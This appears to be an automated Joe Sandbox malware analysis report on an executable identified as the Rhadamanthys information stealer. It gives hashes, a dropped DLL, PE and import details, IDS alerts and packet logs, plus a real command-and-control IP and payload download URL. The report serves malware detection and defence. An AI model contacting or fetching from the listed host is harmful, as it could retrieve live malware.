                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MqE1p1WFrf.exe64%ReversingLabsWin32.Trojan.Phonzy
                      MqE1p1WFrf.exe69%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\nsis_uns60877c.dll21%ReversingLabsWin64.Trojan.Generic
                      C:\Users\user\AppData\Roaming\nsis_uns60877c.dll24%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://discord.com0%URL Reputationsafe
                      http://179.43.163.126/datalib/vldfce.hrgh0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://179.43.163.126/datalib/vldfce.hrghtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://discord.comrundll32.exefalse
                      • URL Reputation: safe
                      		unknown
                      https://discordapp.comrundll32.exefalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        179.43.163.126
                        		unknownPanama
                        		51852PLI-ASCHtrue

                        General Information

                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:790122
                        Start date and time:2023-01-23 21:38:15 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:MqE1p1WFrf.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@4/1@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 20% (good quality ratio 16.9%)
                        • Quality average: 71.7%
                        • Quality standard deviation: 36.9%
                        HCA Information:
                        • Successful, ratio: 67%
                        • Number of executed functions: 61
                        • Number of non-executed functions: 23
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240s for rundll32

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, login.live.com, tile-service.weather.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        PLI-ASCHHSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                        • 81.17.18.197
                        HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                        • 81.17.18.196
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        Invoice.exeGet hashmaliciousBrowse
                        • 81.17.29.150
                        ekstre.exeGet hashmaliciousBrowse
                        • 81.17.29.146
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        bN2hakskfs.exeGet hashmaliciousBrowse
                        • 179.43.175.195
                        jU8u88oMmR.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        fCb55u2aTh.exeGet hashmaliciousBrowse
                        • 179.43.175.195
                        lpcKUPgRBb.exeGet hashmaliciousBrowse
                        • 179.43.175.195
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        Setup.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        file.exeGet hashmaliciousBrowse
                        • 179.43.140.229
                        uEnbBqCbRX.exeGet hashmaliciousBrowse
                        • 81.17.18.194

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\Users\user\AppData\Roaming\nsis_uns60877c.dllbN2hakskfs.exeGet hashmaliciousBrowse
                          fCb55u2aTh.exeGet hashmaliciousBrowse
                            lpcKUPgRBb.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                file.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              file.exeGet hashmaliciousBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Roaming\nsis_uns60877c.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\MqE1p1WFrf.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):50688
                                                                Entropy (8bit):5.651961816231658
                                                                Encrypted:false
                                                                SSDEEP:768:aFrMkWGTEB8sbPDzuW68Ps3yJXMH5Tts9sxlBakygO7wDyEpSDAWG2NqQbZq3sYU:atbDTvBW71G5S9sxlckyV7w5pSAdV3C
                                                                MD5:832890FDED186835970D1D3302590138
                                                                SHA1:5385703E9DCDE43E60928B2E9C941B7232468A6A
                                                                SHA-256:438C088568093AD767802BA5E132EFBD4E643DDF62E4996565C3B46719E3E576
                                                                SHA-512:5CF752EAC75B532B32501C9D469CBCB6638B49CF20DF040554B37986CBE3C068A10E2FF69747B594B5B114111CBBE1CDFBBD0F394A7AC71B863E042414A68AE1
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                • Antivirus: Virustotal, Detection: 24%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: bN2hakskfs.exe, Detection: malicious, Browse
                                                                • Filename: fCb55u2aTh.exe, Detection: malicious, Browse
                                                                • Filename: lpcKUPgRBb.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q.....@...@...@...@...@.g/@...@:.Y@...@:.X@...@:.[@...@..X@...@..[@...@..\@...@..Z@...@Rich...@........................PE..d....J.c.........." .....t...p......t........................................ ............`.............................................L......(...............................x...................................P...p...............H............................text....s.......t.................. ..`.rdata...,...........x..............@..@.data...p5..........................@....pdata..............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):6.25573171450529
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:MqE1p1WFrf.exe
                                                                File size:204800
                                                                MD5:dd10393642798db29a624785ead8ecec
                                                                SHA1:39aad598cfe75a9d8770fef63b5c81db3acfa3b7
                                                                SHA256:0130938796c7911601ade2602e770b07dad32051199372d93c7ed8bfd0e59659
                                                                SHA512:a7bf3f81bca0edbc76ec5a0503f2f2108936a58cddc93712b6ae4e38cc87e430028ff8ce32ce18e13757d22254ca0985497fb93b32f9807ce864b57bc2daef3f
                                                                SSDEEP:6144:uC1Y5jpr0602TzhldWqIk6jKSxPMkksMoK:uC18jpg60OCHNMBxoK
                                                                TLSH:0914F1797073C0B9DEE701765DA44BA65FF83D700364AB8B2E5CB4467EA02FD142A4B2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I..DI..DI..D...DH..D...D]..D...D...D...DD..DI..D!..D...DH..DI..DH..DRichI..D........PE..L......c...........................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x404608
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:
                                                                Time Stamp:0x63B990E2 [Sat Jan 7 15:33:54 2023 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:8ce2f6ebd6de22083d1cd29813b84025

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                push FFFFFFFFh
                                                                push 0042BB58h
                                                                push 00405B04h
                                                                mov eax, dword ptr fs:[00000000h]
                                                                push eax
                                                                mov dword ptr fs:[00000000h], esp
                                                                sub esp, 58h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                mov dword ptr [ebp-18h], esp
                                                                call dword ptr [0040A0A4h]
                                                                xor edx, edx
                                                                mov dl, ah
                                                                mov dword ptr [0042FE50h], edx
                                                                mov ecx, eax
                                                                and ecx, 000000FFh
                                                                mov dword ptr [0042FE4Ch], ecx
                                                                shl ecx, 08h
                                                                add ecx, edx
                                                                mov dword ptr [0042FE48h], ecx
                                                                shr eax, 10h
                                                                mov dword ptr [0042FE44h], eax
                                                                push 00000001h
                                                                call 00007F78FCA1B7CBh
                                                                pop ecx
                                                                test eax, eax
                                                                jne 00007F78FCA1A48Ah
                                                                push 0000001Ch
                                                                call 00007F78FCA1A548h
                                                                pop ecx
                                                                call 00007F78FCA1A7F3h
                                                                test eax, eax
                                                                jne 00007F78FCA1A48Ah
                                                                push 00000010h
                                                                call 00007F78FCA1A537h
                                                                pop ecx
                                                                xor esi, esi
                                                                mov dword ptr [ebp-04h], esi
                                                                call 00007F78FCA1B472h
                                                                call dword ptr [0040A0A0h]
                                                                mov dword ptr [004304F4h], eax
                                                                call 00007F78FCA1B330h
                                                                mov dword ptr [0042FE30h], eax
                                                                call 00007F78FCA1B0D9h
                                                                call 00007F78FCA1B01Bh
                                                                call 00007F78FCA1AD26h
                                                                mov dword ptr [ebp-30h], esi
                                                                lea eax, dword ptr [ebp-5Ch]
                                                                push eax
                                                                call dword ptr [0040A09Ch]
                                                                call 00007F78FCA1AFACh
                                                                mov dword ptr [ebp-64h], eax
                                                                test byte ptr [ebp-30h], 00000001h
                                                                je 00007F78FCA1A488h
                                                                movzx eax, word ptr [ebp+00h]

                                                                Rich Headers

                                                                Programming Language:
                                                                • [C++] VS98 (6.0) SP6 build 8804
                                                                • [ C ] VS98 (6.0) SP6 build 8804
                                                                • [ C ] VS98 (6.0) build 8168

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2c1100x8c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x310000x714.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xa0000x174.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x831a0x9000False0.5704752604166666data6.357204959682375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0xa0000x229600x23000False0.7113699776785715data6.234439159457462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x2d0000x34f80x3000False0.12841796875data1.3798201031355635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .reloc0x310000x100e0x2000False0.1951904296875data2.139426542756408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllCloseHandle, GetLastError, GetQueuedCompletionStatus, IsBadReadPtr, VirtualQuery, GetSystemInfo, IsBadStringPtrA, GetProcessHeap, IsBadCodePtr, CreateIoCompletionPort, InterlockedIncrement, HeapCreate, HeapDestroy, ExitProcess, GetTickCount, lstrlenA, HeapFree, HeapReAlloc, GetModuleHandleA, HeapAlloc, LoadLibraryA, VirtualAlloc, GetOEMCP, GetACP, GetCPInfo, LCMapStringW, LCMapStringA, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, GetStartupInfoA, GetCommandLineA, GetVersion, InterlockedDecrement, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError, TlsGetValue, GetProcAddress, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetEnvironmentVariableA, GetVersionExA, VirtualFree, RtlUnwind, WriteFile
                                                                USER32.dllDispatchMessageW, PeekMessageW, DrawTextW, ShowWindow, TranslateMessage, CreateDialogParamW, IsDialogMessageW
                                                                GDI32.dllCreateCompatibleBitmap, BitBlt, DeleteObject, DeleteDC, CreateRectRgn, CreateCompatibleDC, CreateBitmap, CreatePen
                                                                ole32.dllCoInitializeEx, CreateStreamOnHGlobal, CoTaskMemFree, CoUninitialize, CoTaskMemAlloc
                                                                SHELL32.dllDragFinish, DragAcceptFiles, DragQueryFileW, CommandLineToArgvW
                                                                WINMM.dlltimeBeginPeriod, timeEndPeriod, timeGetTime

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                192.168.2.5179.43.163.12649701802853002 01/23/23-21:39:53.428050TCP2853002ETPRO TROJAN Rhadamanthys Stealer - Data Exfil4970180192.168.2.5179.43.163.126
                                                                179.43.163.126192.168.2.580497002853001 01/23/23-21:39:35.293558TCP2853001ETPRO TROJAN Rhadamanthys Stealer - Payload Response8049700179.43.163.126192.168.2.5
                                                                192.168.2.5179.43.163.12649700802043202 01/23/23-21:39:35.266442TCP2043202ET TROJAN Rhadamanthys Stealer - Payload Download Request4970080192.168.2.5179.43.163.126

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 23, 2023 21:39:35.226453066 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.242511034 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.242811918 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.266442060 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.282215118 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293557882 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293618917 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293662071 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293699980 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293745995 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293780088 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.293790102 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293836117 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293838978 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.293838978 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.293880939 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293926001 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.293936014 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.293972969 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.294022083 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.309982061 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310136080 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310261011 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310302973 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.310334921 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310388088 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.310420036 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310494900 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310550928 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.310566902 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310642004 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310728073 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.310748100 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310838938 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310872078 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310900927 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.310905933 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310940981 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.310960054 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.310973883 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.311008930 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.311031103 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.311042070 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.311074972 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.311098099 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.311108112 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.311140060 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.311167002 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.311173916 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.311300039 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327100992 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327152967 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327187061 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327215910 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327245951 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327244997 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327280045 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327307940 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327337027 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327343941 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327343941 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327369928 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327402115 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327405930 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327438116 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327462912 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327497959 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327527046 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327553988 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327554941 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327584028 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327610970 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327613115 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327641964 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327683926 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327689886 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327721119 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327749014 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327752113 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327785969 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327816010 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327820063 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327846050 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327872992 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327893972 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327914000 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327935934 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327955961 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327960014 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327976942 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.327960968 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327960968 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.327997923 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328018904 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328041077 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328061104 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328082085 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328103065 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328124046 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328124046 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.328124046 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.328124046 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.328145981 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328166962 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328171015 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.328187943 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328211069 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.328237057 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.328237057 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.328259945 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.343904018 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.343957901 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.343991041 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344022036 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344038010 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344055891 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344088078 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344089985 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344126940 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344141960 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344192982 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344227076 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344233036 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344259024 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344291925 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344297886 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344321966 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344355106 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344381094 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344413042 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344413996 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344445944 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344451904 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344476938 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344487906 CET4970080192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:35.344508886 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344540119 CET8049700179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:35.344552040 CET4970080192.168.2.5179.43.163.126
